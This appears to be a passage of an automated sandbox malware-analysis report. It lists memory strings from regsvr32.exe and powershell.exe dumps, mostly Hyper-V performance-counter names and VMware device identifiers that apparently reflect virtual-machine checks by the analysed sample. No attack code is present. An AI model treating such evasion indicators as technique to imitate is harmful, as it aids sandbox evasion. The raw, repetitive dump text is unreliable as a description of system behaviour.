Source: regsvr32.exe, 00000008.00000003.1800581140.00000000026F9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1795089953.00000000026E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1799588227.00000000026F9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1799915558.00000000026EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1795264291.00000000026F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Se
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitionn
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service4%?
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionB={
Source: regsvr32.exe, 00000008.00000003.1807239106.0000000000DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorys
Source: regsvr32.exe, 00000010.00000003.1993427043.0000000002C23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1973208647.00000000012B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
Source: regsvr32.exe, 00000010.00000003.1976260706.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1976436942.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1973586115.0000000002C16000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1974619159.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1994468991.0000000002C23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1975765105.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1995226542.0000000002C01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1973991341.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1994373339.0000000002C23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1971260445.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1994063967.0000000002C23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor
Source: regsvr32.exe, 00000010.00000003.1995438252.0000000002CD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Ro
Source: regsvr32.exe, 00000010.00000003.1975484551.00000000012BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated
Source: regsvr32.exe, 00000010.00000003.1993640876.0000000002C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Tim
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor.mui`
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V wwqkrpglnloojsk Bus Pipes
Source: regsvr32.exe, 00000010.00000003.2020259374.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
Source: regsvr32.exe, 00000010.00000003.2020259374.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
